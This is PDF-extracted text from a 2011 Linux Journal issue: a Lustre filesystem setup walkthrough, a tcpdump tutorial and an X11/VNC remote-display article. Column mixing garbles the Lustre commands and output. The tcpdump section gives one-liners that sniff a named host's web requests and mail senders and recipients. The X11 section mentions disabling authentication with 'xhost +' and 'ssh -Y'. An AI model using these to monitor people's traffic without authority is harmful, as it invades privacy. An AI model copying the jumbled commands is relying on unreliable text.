(MDT MGS needs_index first_time update )Persistent mount opts: iopen_nopriv,user_xattr,errors=remount-roParameters: mdt.group_upcall=/usr/sbin/l_getgroupsdevice size = 1019MBunique names for each labeled volume. Thesenames become very important for when youaccess the target on the client system.Create the OST by executing the followingcommand:2 6 18formatting backing filesystem ldiskfs on /dev/sda1target name lustre-MDTffff[petros@lustre-host ~]$ sudo /usr/sbin/mkfs.lustre --ost--fsname=lustre --mgsnode=10.0.2.15@tcp0 /dev/sda24k blocks 261048options -i 4096 -I 512 -q -O dir_index,uninit_groups -FPermanent disk data:mkfs_cmd = mke2fs -j -b 4096 -L lustre-MDTffff -i 4096 -I 512 -q -Odir_index,uninit_groups -F /dev/sda1 261048Writing CONFIGS/mountdataTarget:Index:Lustre FS:lustre-OSTffffunassignedlustreIf nothing has been provided, by default,the fsname is lustre. If one or more of thesefilesystems are created, it is necessary to useMount type: ldiskfsFlags: 0x72(OST needs_index first_time update )Persistent mount opts: errors=remount-ro,extents,mballocMicroway’s Proven GPU ExpertiseThousands of GPU cluster nodes installed.Thousands of WhisperStations delivered.Award Winning BioStack – LSAward Winning WhisperStation Tesla – PSC with 3D‘11AWARDBESTBest NewTechnologyns/Day (Higher is Better)CPU + GPUCPU Only1.070.332.020.653.541.301 Node2 Nodes 4 NodesNAMD F1-ATP Performance GainVisit Microway at SC11 Booth 2606


FEATURE The Lustre Distributed FilesystemParameters: mgsnode=10.0.2.15@tcpchecking for existing Lustre data: not founddevice size = 1027MB2 6 18formatting backing filesystem ldiskfs on /dev/sda2target name lustre-OSTffff4k blocks 263064options -J size=40 -i 16384 -I 256 -q -Odir_index,extents,uninit_groups -Fmkfs_cmd = mke2fs -j -b 4096 -L lustre-OSTffff-J size=40 -i 16384 -I 256 -q -Odir_index,extents,uninit_groups -F /dev/sda2 263064Writing CONFIGS/mountdataThe /var/log/messages file will log thefollowing messages:Jun 25 10:26:54 lustre-host kernel: Lustre: lustre-MDT0000:new disk, initializingJun 25 10:26:54 lustre-host kernel: Lustre: lustre-MDT0000:Now serving lustre-MDT0000 on /dev/sda1 with recovery enabledJun 25 10:26:54 lustre-host kernel: Lustre:3285:0:(lproc_mds.c:271:lprocfs_wr_group_upcall())lustre-MDT0000: group upcall set to /usr/sbin/l_getgroupsJun 25 10:26:54 lustre-host kernel: Lustre: lustre-MDT0000.mdt:set parameter group_upcall=/usr/sbin/l_getgroupsMount the OST:When the target needs to provideinformation to the MGS or when the clientaccesses the target for information lookup,all also will need to be aware of where theMGS is, which you have defined for thistarget as the server’s IP address followed bythe network interface for communication.This is just a reminder that the interface wasdefined earlier in the /etc/modprobe.conf file.Now you easily can mount thesenewly formatted devices local to the hostmachine. Mount the MDT:[petros@lustre-host ~]$ sudo mkdir -p /mnt /ost[petros@lustre-host ~]$ sudo mount -t lustre /dev/sda2 /mnt/ost/Verify that it is mounted with the dfcommand:[petros@lustre-host ~]$ df -t lustreFilesystem 1K-blocks Used Available Use% Mounted on/dev/sda1 913560 17768 843584 3% /mnt/mdt/dev/sda2 1035692 42460 940620 5% /mnt/ostThe /var/log/messages file will log thefollowing messages:[petros@lustre-host ~]$ sudo mkdir -p /mnt /mdt[petros@lustre-host ~]$ sudo mount -t lustre /dev/sda1 /mnt/mdt/Verify that it is mounted with the dfcommand:[petros@lustre-host ~]$ df -t lustreFilesystem 1K-blocks Used Available Use% Mounted on/dev/sda1 913560 17752 843600 3% /mnt/mdtJun 25 10:41:33 lustre-host kernel: Lustre:lustre-OST0000: new disk, initializingJun 25 10:41:33 lustre-host kernel: Lustre:lustre-OST0000: Now serving lustre-OST0000 on/dev/sda2 with recovery enabledJun 25 10:41:39 lustre-host kernel: Lustre:3417:0:(mds_lov.c:1155:mds_notify()) MDS lustre-MDT0000:add target lustre-OST0000_UUID86 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


FAILOVERFailover is a process with the capability to switch over automatically to a redundant orstandby computer server, system or network upon the failure or abnormal terminationof the previously active application, server, system or network. Many failover solutionsexist on the <strong>Linux</strong> platform to cover both SAN and LAN environments.Jun 25 10:41:39 lustre-host kernel: Lustre:3188:0:(quota_master.c:1716:mds_quota_recovery())Only 0/1 OSTs are active, abort quota recoveryJun 25 10:41:39 lustre-host kernel: Lustre: lustre-OST0000:received MDS connection from 0@loJun 25 10:41:39 lustre-host kernel: Lustre: MDS lustre-MDT0000:lustre-OST0000_UUID now active, resetting orphansclient node, you must specify this name.This can be observed below followingthe network method (tcp0) by which youare mounting the remote volume. Again,TCP was defined in the /etc/modprobe.conffile for the supported LNET networksinterfaces:Even though they are mounted like typicalfilesystems, you will notice that the MDTand OST labeled volumes do not containthe typical filesystem characteristics. That iswhere the client will come into play:[petros@lustre-host ~]$ ls /mnt/ost/[petros@client1 ~]$ sudo mkdir -p /lustre[petros@client1 ~]$ sudo mount -t lustre10.0.2.15@tcp0:/lustre /lustre/After successfully mounting the remotevolume, you will see the /var/log/messagesfile append:ls: /mnt/ost/: Not a directory[petros@lustre-host ~]$ sudo ls /mnt/ost/ls: /mnt/ost/: Not a directory[petros@lustre-host ~]$ sudo ls -l /mnt/total 4d--------- 1 root root 0 Jun 25 10:22 ostJun 25 10:44:17 client1 kernel: Lustre:Client lustre-client has startedUse df to list the mounted Lustre-enabledvolumes:d--------- 1 root root0 Jun 25 10:22 mdtConfiguring Lustre Client(s)Remember that you named the Lustreenabledvolume lustre. When you mountthe volume over the network on the[petros@client1 ~]$ df -t lustreFilesystem1K-blocks Used Available Use% Mounted on10.0.2.15@tcp0:/lustre 1035692 42460 940556 5% /lustreOnce mounted, the filesystem nowWWW.LINUXJOURNAL.COM / OCTOBER <strong>2011</strong> / 87


FEATURE The Lustre Distributed Filesystemcan be accessed by the client node. Forinstance, you cannot read or write fromor to files located on the mounted OST.In the following example, let’s writeapproximately 40MB of data to a newfile, on /lustre:[petros@client1 lustre]$ sudo dd if=/dev/zeroof=/lustre/test.dat bs=4M count=1010+0 records in10+0 records out41943040 bytes (42 MB) copied, 1.30103 seconds, 32.2 MB/sA df listing will reflect the changesof available and used capacities to the/lustre mountpoint:[petros@client1 lustre]$ df -t lustreFilesystem 1K-blocks Used Available Use% Mounted on10.0.2.15@tcp0:/lustre 1035692 83420 899596 9% /lustre[petros@client1 lustre]$ ls -ltotal 40960-rw-r--r-- 1 root root 41943040 Jun 25 10:47 test.datSummaryAlthough I covered a simple introduction andtutorial of the Lustre distributed filesystem,there still is so much uncharted territoryand methods by which the filesystem canbe configured for a truly rich computingenvironment. For instance, Lustre can beconfigured for high availability to ensurethat in the situation of failure, the system’sservices continue without interruption.That is, the accessibility between theclient(s), server(s) and external targetstorage is always made available througha process called failover. Additional HAis provided through an implementationof disk drive redundancy in some sort ofRAID (hardware or software via mdadm)configuration for the event of drive failures.These high-availability techniques normallywould apply to server nodes hosting theMDS and OSS. It is suggested to place theOST storage on a RAID 5 or, preferably,RAID 6, while the MDT storage should beRAID 1 or RAID 0+1.It isn’t a difficult technology to workwith; however, there still exists an entirecommunity with excellent administratorand developer resources ranging fromarticles, mailing lists and more to aidthe novice in installing and maintaininga Lustre-enabled system. Commercialsupport for Lustre is made available bya non-exhaustive list of vendors sellingbundled computing and Lustre storagesystems. Many of these same vendorsalso are contributing to the Open Sourcecommunity surrounding the Lustre Project.■Petros Koutoupis is a full-time <strong>Linux</strong> kernel, device-driver andapplication developer for embedded and server platforms. He hasbeen working in the data storage industry for more than sevenyears and enjoys discussing the same technologies.ResourcesLustre Project Page: wiki.lustre.org/index.phpWikipedia: Lustre:en.wikipedia.org/wiki/Lustre_(file_system)Wikipedia: Distributed File Systems:en.wikipedia.org/wiki/Distributed_file_system88 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


If You Use <strong>Linux</strong>, You Should BeReading LINUX JOURNAL❯❯ In-depth informationproviding a full 360-degree look at featuredtopics relating to <strong>Linux</strong>❯❯ Tools, tips and tricks youwill use today as well asrelevant information forthe future❯❯ Advice and inspiration forgetting the most out ofyour <strong>Linux</strong> system❯❯ Instructional how-tos willsave you time and moneySubscribe now for instant access!For only $29.50 per year—lessthan $2.50 per issue—you’ll haveaccess to <strong>Linux</strong> <strong>Journal</strong> eachmonth as a PDF, in ePub format,on-line and through our Android app.Wherever you go, <strong>Linux</strong> <strong>Journal</strong>goes with you.SUBSCRIBE NOW AT:WWW.LINUXJOURNAL.COM/SUBSCRIBE


tcpdump fuUnleash the power andconvenience of the original,venerable, command-linenetwork analysis utility.HENRY VAN STYN90 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


Packet capture is one of the mostfundamental and powerful waysto do network analysis. You canlearn virtually anything about what is goingon within a network by intercepting andexamining the raw data that crosses it.Modern network analysis tools are able tocapture, interpret and describe this networktraffic in a human-friendly manner.tcpdump is one of the original packetcapture (or “sniffing”) tools that providethese analysis capabilities, and eventhough it now shares the field with manyother utilities, it remains one of the mostpowerful and flexible.If you think that tcpdump has been madeobsolete by GUI tools like Wireshark, thinkagain. Wireshark is a great application;it’s just not the right tool for the job inevery situation. As a refined, universal,lightweight command-line utility—muchlike cat, less and hexdump—tcpdumpsatisfies a different type of need.One of tcpdump’s greatest strengths is itsconvenience. It uses a “one-off-command”approach that lends itself to quick, on-thespotanswers. It works through an SSHsession, doesn’t need X and is more likelyto be there when you need it. And, becauseit uses standard command-line conventionsThe tcpdump/libpcap Legacytcpdump has been the de facto packet capture tool for the past 25 years. It reallydid spawn the whole genre of network utilities based on sniffing and analyzingpackets. Prior to tcpdump, packet capture had such high processing demandsthat it was largely impractical. tcpdump introduced some key innovations andoptimizations that helped make packet capture more viable, both for regularsystems and for networks with a lot of traffic.The utilities that came along afterward not only followed tcpdump’s lead, but alsodirectly incorporated its packet capture functionality. This was possible becausevery early on, tcpdump’s authors decided to move the packet capture code into aseparate portable library called libpcap.Wireshark, ntop, snort, iftop, ngrep and hundreds of other applications andutilities available today are all based on libpcap. Even most packet captureapplications for Windows are based on a port of libpcap called WinPcap.WWW.LINUXJOURNAL.COM / OCTOBER <strong>2011</strong> / 91


FEATURE tcpdump fu(such as writing to STDOUT, which can beredirected), tcpdump can be used in allsorts of creative, interesting and extremelyuseful ways.In this article, I introduce some of the basicsof packet capture and provide a breakdownof tcpdump syntax and usage. I show how touse tcpdump to zero in on specific packetsand reveal the useful information theycontain. I provide some real-world examplesof how tcpdump can help put the details ofwhat’s happening on your network at yourfingertips, and why tcpdump is still a musthavein any admin’s toolbox.Essential ConceptsBefore you can begin to master tcpdump, youshould understand some of the fundamentalsthat apply to using all packet sniffers:■ Packet capturing is passive—it doesn’ttransmit or alter network traffic.■ You can capture only the packets thatyour system receives. On a typicalswitched network, that excludes unicasttraffic between other hosts (packets notsent to or from your machine).■ You can capture only packets addressed toyour system, unless the network interfaceis in promiscuous mode.It is assumed that you’re interested inseeing more than just your local traffic,so tcpdump turns on promiscuous modeautomatically (which requires root privileges).But, in order for your network card to receivethe packets in the first place, you still have tobe where the traffic is, so to speak.Anatomy of a tcpdump CommandA tcpdump command consists of twoparts: a set of options followed by a filterexpression (Figure 1).Figure 1. Example tcpdump CommandThe expression identifies which packets tocapture, and the options define, in part, howthose packets are displayed as well as otheraspects of program behavior.Optionstcpdump options follow the standardcommand-line flag/switch syntax conventions.Some flags accept a parameter, such as -ito specify the capture interface, while othersare standalone switches and can be clustered,such as -v to increase verbosity and -n toturn off name resolution.The man page for tcpdump lists allavailable options, but here are a few of thenoteworthy ones:■ -i interface: interface to listen on.■ -v, -vv, -vvv: more verbose.■ -q: less verbose.92 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


■ -e: print link-level (Ethernet) headers.■ -N: display relative hostnames.■ -t: don’t print timestamps.■ -n: disable name lookups.■ -s0 (or -s 0): use the max “snaplen”—capture full packets (default in recentversions of tcpdump).None of these are required. User-suppliedoptions simply modify the default programbehavior, which is to capture from the firstinterface, and then print descriptions ofmatching packets on the screen in a singlelineformat.Filter ExpressionThe filter expression is the Boolean (true orfalse) criteria for “matching” packets. Allpackets that do not match the expressionare ignored.The filter expression syntax is robust andflexible. It consists primarily of keywords calledprimitives, which represent various packetmatchingqualifiers, such as protocol, address,port and direction. These can be chainedtogether with and/or, grouped and nestedwith parentheses, and negated with not toachieve virtually any criteria.Because the primitives have friendlynames and do a lot of the heavy lifting, filterexpressions are generally self-explanatory andeasy to read and construct. The syntax is fullydescribed in the pcap-filter man page, buthere are a few example filter expressions:■ tcp■ port 25 and not host 10.0.0.3■ icmp or arp or udp■ vlan 3 and ether src hostaa:bb:cc:dd:ee:ff■ arp or udp port 53■ icmp and \(dst host mrorangeor dst host mrbrown\)Like the options, filter expressions arenot required. An empty filter expressionsimply matches all packets.Understanding tcpdump OutputHow much sense the output makes dependson how well you understand the protocols inquestion. tcpdump tailors its output to matchthe protocol(s) of the given packet.For example, ARP packets are displayed likethis when tcpdump is called with -t and -n(timestamps and name lookups turned off):arp who-has 10.0.0.1 tell 10.0.0.2arp reply 10.0.0.1 is-at 00:01:02:03:04:05ARP is a simple protocol used to resolveIPs into MAC addresses. As you can seeabove, tcpdump describes these packetsin a correspondingly simple format. DNSpackets, on the other hand, are displayedWWW.LINUXJOURNAL.COM / OCTOBER <strong>2011</strong> / 93


FEATURE tcpdump fucompletely different:IP 10.0.0.2.50435 > 10.0.0.1.53: 19+ A? linuxjournal.com. (34)IP 10.0.0.1.53 > 10.0.0.2.50435: 19 1/0/0 A 76.74.252.198 (50)This may seem cryptic at first, but itmakes more sense when you understandhow protocol layers work. DNS is a morecomplicated protocol than ARP to beginwith, but it also operates on a higher layer.This means it runs over top of other lowerlevelprotocols, which also are displayed inthe output.Unlike ARP, which is a non-routable, layer-3protocol, DNS is an Internet-wide protocol.It relies on UDP and IP to carry and route itacross the Internet, which makes it a layer-5protocol (UDP is layer-4, and IP is layer-3).The underlying UDP/IP information,consisting of the source and destinationIP/port, is displayed on the left side of thecolon, followed by the remaining DNSspecificinformation on the right.Even though this DNS information still isdisplayed in a highly condensed format, youshould be able to recognize the essentialelements if you know the basics of DNS. Thefirst packet is a query for linuxjournal.com,and the second packet is an answer, givingthe address 76.74.252.198. These are thekind of packets that are generated fromsimple DNS lookups.See the “OUTPUT FORMAT” section of thetcpdump man page for complete descriptionsof all the supported protocol-specific outputformats. Some protocols are better servedthan others by their output format, but I’vefound that tcpdump does a pretty goodjob in general of showing the most usefulinformation about a given protocol.Capture FilesIn addition to its normal behavior ofprinting packet descriptions to the screen,tcpdump also supports a mode of operationwhere it writes packets to a file instead.This mode is activated when the -w optionis used to specify an output capture file.When writing to a file, tcpdump uses acompletely different format from when itwrites to the screen. When writing to thescreen, formatted text descriptions of packetsare printed. When writing to a file, the rawpackets are recorded as is, without analysis.Instead of doing a live capture, tcpdumpalso can read from an existing capture file asinput with the -r option. Because tcpdumpcapture files use the universally supported“pcap” format, they also can be opened byother applications, including Wireshark.This gives you the option to capture packetswith tcpdump on one host, but performanalysis on a different host by transferringand loading the capture file. This lets you useWireshark on your local workstation withouthaving to attach it to the network andlocation you need to capture from.Analyzing TCP-Based Application Protocolstcpdump is a packet-based analyzer, andit works great for connectionless, packetbasedprotocols like IP, UDP, DHCP, DNS andICMP. However, it cannot directly analyze“connection-oriented” protocols, such as94 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


HTTP, SMTP and IMAP, because they workcompletely different.They do not have the concept of“packets”. Instead, they operate over thestream-based connections of TCP, whichprovide an abstracted communicationslayer. These application protocols are reallymore like interactive console programs thanpacket-based network protocols.TCP transparently handles all of theunderlying details required to provide thesereliable, end-to-end, session-style connections.This includes encapsulating the stream-baseddata into packets (called segments) thatcan be sent across the network. All of thesedetails are hidden below the application layer.In order to capture TCP-based applicationprotocols, an extra step is needed beyondcapturing packets. Because each TCPsegment is only a slice of application data,it can’t be used individually to obtain anymeaningful information. You first mustreassemble TCP sessions (or flows) fromthe combined sets of individual segments/packets. The application protocol data iscontained directly within the sessions.tcpdump doesn’t have an option toassemble TCP sessions from packetsdirectly, but you can “fake” it by usingwhat I call “the tcpdump strings trick”.The tcpdump Strings TrickUsually when I’m capturing traffic, it’s justfor the purpose of casual analysis. The datadoesn’t need to be perfect if it shows mewhat I’m looking for and helps me gainsome insight.In these cases, speed and conveniencereign supreme. The following trick is alongthese lines and is one of my favorite tcpdumptechniques. It works because:1. TCP segments usually are sent inchronological order.2. Text-based application protocols produceTCP segments with text payloads.3. The data surrounding the text payloads,such as packet headers, is usually not text.4. The UNIX command strings filters outbinary data from streams preserving onlytext (printable characters).5. When tcpdump is called with -w - itprints raw packets to STDOUT.Put it all together, and you get a commandthat dumps real-time HTTP session data:tcpdump -l -s0 -w - tcp dst port 80 | stringsThe -l option above turns on linebuffering, which makes sure data getsprinted to the screen right away.What is happening here is tcpdump isprinting the raw, binary data to the screen.This uses a twist on the -w option where thespecial filename - writes to STDOUT insteadof a file. Normally, doing this would displayall kinds of gibberish, but that’s where thestrings command comes in—it allows onlydata recognized as text through to the screen.WWW.LINUXJOURNAL.COM / OCTOBER <strong>2011</strong> / 95


FEATURE tcpdump fuThere are few caveats to be aware of.First, data from multiple sessions receivedsimultaneously is displayed simultaneously,clobbering your output. The more refinedyou make the filter expression, the less ofa problem this will be. You also should runseparate commands (in separate shells) forthe client and server side of a session:tcpdump -l -s0 -w - tcp dst port 80 | stringstcpdump -l -s0 -w - tcp src port 80 | stringsAlso, you should expect to see a fewgibberish characters here and therewhenever a sequence of binary dataalso happens to look like text characters.You can cut down on this by increasingmin-len (see the strings man page).This trick works just as well for othertext-based protocols.HTTP and SMTP AnalysisUsing the strings trick in the previoussection, you can capture HTTP dataeven though tcpdump doesn’t actuallyunderstand anything about it. You then can“analyze” it further in any number of ways.If you wanted to see all the Web sitesbeing accessed by “davepc” in real time,for example, you could run this commandon the firewall (assume the internalinterface is eth1):tcpdump -i eth1 -l -s0 -w - host davepc and port 80 \| strings | grep 'GET\|Host'In this example, I’m using a simple grepcommand to display only lines with GET orHost. These strings show up in HTTP requestsand together show the URLs being accessed.This works just as well for SMTP. You couldrun this on your mail server to watch e-mailsenders and recipients:tcpdump -l -s0 -w - tcp dst port 25 | strings \| grep -i 'MAIL FROM\|RCPT TO'These are just a few silly examples toillustrate what’s possible. You obviouslycould take it beyond grep. You could go asfar as to write a Perl script to do all sorts ofsophisticated things. You probably wouldn’ttake that too far, however, because at thatpoint, there are better tools that actually aredesigned to do that sort of thing.The real value of tcpdump is the abilityto do these kinds of things interactively andon a whim. It’s the power to look inside anyaspect of your network whenever you wantwithout a lot of effort.Debugging Routes and VPN Linkstcpdump is really handy when debuggingVPNs and other network connections byshowing where packets are showing up andwhere they aren’t. Let’s say you’ve set up astandard routable network-to-network VPNbetween 10.0.50.0/24 and 192.168.5.0/24(Figure 2).If it’s operating properly, hosts from eithernetwork should be able to ping one another.However, if you are not getting replies whenpinging host D from host A, for instance, youcan use tcpdump to zero in on exactly where96 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


Figure 2. Example VPN Topologythe breakdown is occurring:tcpdump -tn icmp and host 10.0.50.2In this example, during a ping from10.0.50.2 to 192.168.5.38, each round tripshould show up as a pair of packets like thefollowing, regardless of from which of thefour systems the tcpdump command is run:IP 10.0.50.2 > 192.168.5.38: ICMP echo request,id 46687, seq 1, length 64IP 192.168.5.38 > 10.0.50.2: ICMP echo reply,id 46687, seq 1, length 64If the request packets make it to hostC (the remote gateway) but not to D, thisindicates that the VPN itself is working, butthere could be a routing problem. If host Dreceives the request but doesn’t generate areply, it probably has ICMP blocked. If it doesgenerate a reply but it doesn’t make it back toC, then D might not have the right gatewayconfigured to get back to 10.0.50.0/24.Using tcpdump, you can follow the pingthrough all eight possible points of failureas it makes its way across the network andback again.ConclusionI hope this article has piqued yourinterest in tcpdump and given you somenew ideas. Hopefully, you also enjoyedthe examples that barely scratch thesurface of what’s possible.Besides its many built-in features andoptions, as I showed in several examples,tcpdump can be used as a packet-dataconduit by piping into other commandsto expand the possibilities further—even if you do manage to exhaust itsextensive “advertised” capabilities. Theways to use tcpdump are limited only byyour imagination.tcpdump also is an incredible learningtool. There is no better way to learn hownetworks and protocols work than fromwatching their actual packets.Don’t forget to check out the tcpdumpand pcap-filter man pages for additionaldetails and information.■Henry Van Styn is the founder of IntelliTree Solutions, an ITconsulting and software development firm located in Cincinnati,Ohio. Henry has been developing software and solutions formore than ten years, ranging from sophisticated Web applicationsto low-level network and system utilities. He is the author ofStrong Branch <strong>Linux</strong>, an in-house server distribution based onGentoo. Henry can be contacted at www.intellitree.com.Resourcestcpdump and libpcap: www.tcpdump.orgWireshark: www.wireshark.orgTCP/IP Model: en.wikipedia.org/wiki/TCP/IP_modelWWW.LINUXJOURNAL.COM / OCTOBER <strong>2011</strong> / 97


INDEPTHRemote Viewing—Not Just a PsychicPowerMore and more often these days you need to work on remotemachines. What can you do when the command line isn’tenough? JOEY BERNARDMost people today are used to having anice, intuitive graphical environment whenthey sit down to use a computer. Gone arethe days of using a DOS machine or beinglucky enough to have a dial-up accountat 300 baud on a UNIX mainframe. Today,most people expect to be able to point andclick their way to work nirvana, even whenthat work is being done on some othermachine over a network. In this article,I look at some of the available options,what the relative costs and benefits are,and hopefully by the end, you should haveenough information to make a choice as towhat would be the best option for you.Before I begin though, I probably shouldtake a look at what actually is involved inusing a GUI on <strong>Linux</strong>. The overwhelmingmajority of <strong>Linux</strong> users will be using the X11Window System (typically shortened to justX11). X11 has been around since 1987. Sincethen, it has gone through several revisions,and it’s currently at R7. Any X11 installationyou are likely to encounter will be someversion of X11R7. There have been attemptsto replace it, including Wayland, Berlin/Frescoand the Y Window System, but they arefairly rare out in the wild, and you’ll need togo out of your way to run into them.X11 is built on a client-server model. In thismodel, the X11 server is the part that actuallydraws on a physical screen. As such, it is thepart you end up running on your desktop infront of you. The client portion in this modelis the user-space program that has outputthat needs to be seen by the end user.The client does this by sending requeststo the X11 server. These are high leveland of the form “Draw a window”, “Addtext to the window border”, “Move thewindow to the right by x pixels”. Becauseof this, there potentially can be a lot of98 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


INDEPTHmessages, those messages easily can besent over a network connection.The first thought that should come toyou is “Hey, I can open a window on myfriend’s machine and display rude picturesthere.” Unfortunately, the writers of theX11 specification have beaten you thereand closed that particular hole. By default,X11 servers are configured not to acceptconnections from clients on the network.You have to allow this explicitly. You can usetwo separate mechanisms to allow externalconnections. The older one is called xhosts.With xhosts, you tell the X11 server toaccept connections from the servers that youpermit. The command looks like this:xhost +111.222.333.444Figure 1. The X11 Window System (fromWikipedia)communication if a lot is going on.When most people experience X11,both parts of this model are running onthe desktop in front of them. But, thisisn’t the only option. There is no reasonfor the client and server to be on the samemachine, or even on the same continent.Because everything is done by sendingThe newer authentication mechanism iscalled xauth. In this method, the X11 servercreates a cookie that is required in order toconnect to the X11 server. If you want toconnect to the X11 server from a remotemachine, you need to copy this cookie overto the remote machine. An example ofdoing this, from the xauth man page is:xauth extract - $DISPLAY | ssh otherhost xauth merge -This command pulls out the cookie forthe current X11 server and “SSHes” it overto the remote machine and merges it intothe user’s xauth file.Once you have done this, how do clientWWW.LINUXJOURNAL.COM / OCTOBER <strong>2011</strong> / 99


INDEPTHapplications go ahead and connect to yourX11 server? All programs that run underX11 accept certain command-line options.One of these is -display. With thisoption, you can tell your client program towhich X11 server to connect and send itsoutput. The general form of this option is:-display hostname:display#.screen#The reason for all of the parts of thisoption is that a given machine could berunning more than one X11 server, andeach server could be running more than onedisplay screen. The first server and screen islabeled as 0.0, so in most cases you will use:-display hostname:0.0As an aside, you can do this on yourdesktop. If you open a terminal, you canrun an X11 client program with:-display :0.0and it will show up on your default desktop.A consequence of this is that youneed to have a connection to the remotemachine that will be running the clientprogram. Most times, this connection willbe over an SSH connection between yourlocal machine and the remote machine.Luckily, SSH provides the ability to tunnelX11 traffic over your SSH connection foryou. This tunneling happens “out-ofband”,so to speak. You start a sessionby SSHing in to your remote machine andusing either the -X or -Y options. The -Xoption is the preferred method. It sets up asecure X11 socket on the remote machineusing xauth as the authentication system.Unfortunately, some X11 servers have ahard time with this, so you can use -Y. Thisessentially turns off any authentication. It isequivalent to using xhost +.Once your SSH connection is established,a new X11 socket is created on the remotemachine, and the environment variableDISPLAY is set to point to it. From hereon, any X11 applications you start on thisremote machine will send their output toyour X11 server on your desktop. Whenyou do this, you may notice something. Inmost cases, it is unbelievably slow—evenslower than slow if the machine you areconnecting to is any appreciable distanceaway. Due, in part, to this issue, the SSHdevelopers have included an extra option,-C. This turns on compression of thedata traveling over the SSH connection. Aside effect is that the packets being sentcontaining the X11 protocol instructionsget bunched together and sent as a singleunit. This makes much more efficient use ofthe bandwidth available, because you arecutting down the amount of control datathat also gets sent over the line.As I mentioned above, both X11 andX11 over SSH are notoriously slow. Insome cases, it is nearly unusable. Luckily,there’s another option available, VNC.VNC also follows the client/server model,but it reverses the location of the clientand server from what you might be used100 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


INDEPTHVNC also follows the client/server model, butit reverses the location of the client and serverfrom what you might be used to with X11.to with X11. With VNC, you run a serverout on the remote machine and then use aclient on your desktop in front of you. Youcan run a VNC server in the background,where it sits and acts like any other service.It also doesn’t use any of the standard X11sockets, so it will not interfere with anystandard X11 desktop that also may berunning on the remote machine. Becauseit runs as a service, it can continue to run,whether you are connected to it or not.You can think of it as a GUI version of theold standby, screen.There also are client applications forall the major operating systems, and theyare much lighter weight than a full X11server. So, you can start up vncserver onthe remote machine, connect to it fromyour Windows box, start some longrunningprocess, disconnect and go home,and then check on its progress from your<strong>Linux</strong> box. This is a great improvement overstraight X11. Also, you will notice thatin most cases, it is a bit more responsivethan X11 was. This is due to the amountof information being sent back and forthbetween the client and server parts of VNC.The server command is simply vncserver.When you run this command, a directorynamed .vnc is created in your homedirectory if it doesn’t exist already. If apassword has not been set yet for thisinstance of the VNC server, it will ask youto enter one. It is saved in the file passwdin encrypted form. If you want to change it,you can use the command vncpasswd. Inthis directory, you also should find log filesfor each instance of vncserver that you start,as well as a pid file containing the PID ofany currently running instances of vncserver.The last file of interest is the xstartup file.This is the file that is used when you startvncserver to set up all the required optionsand also lay out what will be run on thevncserver desktop. The defaults on myUbuntu system look like this:#!/bin/shxrdb $HOME/.Xresourcesxsetroot -solid grey#x-terminal-emulator -geometry 80x24+10+10 -ls -title"$VNCDESKTOP Desktop" &#x-window-manager &# Fix to make GNOME workexport XKL_XMODMAP_DISABLE=1/etc/X11/XsessionSo in this case, it sets the background togray and then tries to run whatever sessionis defined in the global script Xsession. Thisis where you can do some editing and makeWWW.LINUXJOURNAL.COM / OCTOBER <strong>2011</strong> / 101


INDEPTHFigure 2. Fluxbox Running under vncserverit your own. I prefer Fluxbox as a windowmanager on smaller screens. So you cansimplify this to:#!/bin/shxrdb $HOME/.XresourcesstartfluxboxStarting this gives you a nice-lookingdesktop running Fluxbox. If the client thatis going to be connecting to this has todeal with a smaller screen size (like on aNetbook), you can set the desktop size onthe command line with the -geometryoption. You also can set the color depthof the virtual desktop with the -depthoption. So, to set up a server that looksnice when I connect to it from my Netbook,I would use this:vncserver -geometry 800x600Now, what about the other end? Thereare two general classes of vncviewerapplications, GUI and command line. TheGUI versions, like the most common onesfor Mac OS X and Windows, have pointand-clickaccess to all the relevant options.They also have them in different locations,depending on who wrote your particularfavorite viewer. Because VNC is a protocol(kind of like FTP or HTTP), there is a greatdeal of variation in what you get from thevarious implementers. Let’s look at the102 / OCTOBER <strong>2011</strong> / WWW.LINUXJOURNAL.COM


INDEPTHcommand-line versions here and see whatyou can do with those. The GUI versionsshould have comparable options available.To connect to a vncserver, you would run:vncviewer hostname:portwhere hostname is either the truehostname of the remote machine or its IPaddress. port is the port number on whichthe vncserver is listening, starting at 1. Thisnumber is added to the default startingport number 5900, so the actual networkport number in this case is 5901. This willtry to connect to the given server, and itwill ask for a password if one had been setduring vncserver’s startup. Then, you get anice Fluxbox desktop.There are lots of options for changingvarious parts of what is being transmitted,such as the encoding algorithm, thecompression level and the quality level.Playing with these options can improve yoursession’s responsiveness, potentially at thecost of some image quality. Depending onwhat work you are trying to do, this maynot be a trade-off you are willing to make.Although you can force some kind ofauthentication on VNC, that may not beenough in these security-conscious days.You may have to work with a remotemachine that sits behind a firewall thatallows only SSH traffic. What can you do?VNC allows for tunneling of the protocolover an SSH connection by using the -viagateway option. This gateway machine isthe machine that you are SSHing in to forthe tunneling. If this is the same machineas your vncserver, the command would looklike this:vncviewer -via user@somehost.com localhost:1This tells vncviewer to ssh to somehost.comas user “user”, then connect to vncserveron the localhost to somehost.com—inother words, somehost.com itself. There isno reason that these need to be the samemachine. This means you could connect toa vncserver on a machine behind a securitygateway machine. In this case, it wouldlook like this:vncviewer -via user@gateway.com someotherhost.com:1Be aware that VNC still will ask you toauthenticate after the SSH session hasbeen established.ConclusionHopefully, this article has provided someoptions for those times when you just can’tlive without a nice graphical interface. Evenwhen you are forced to squeeze throughan SSH connection, you still can have all ofthat great GUI goodness. If you know ofother ways of getting a graphical interfaceon a remote machine, I would love to hearabout them.■Joey Bernard spends his days helping university researchersdo scientific computing. But by night, he is a masked crusaderfighting crime—at least, once he gets the kids to sleep and canhit the sack himself.WWW.LINUXJOURNAL.COM / OCTOBER <strong>2011</strong> / 103


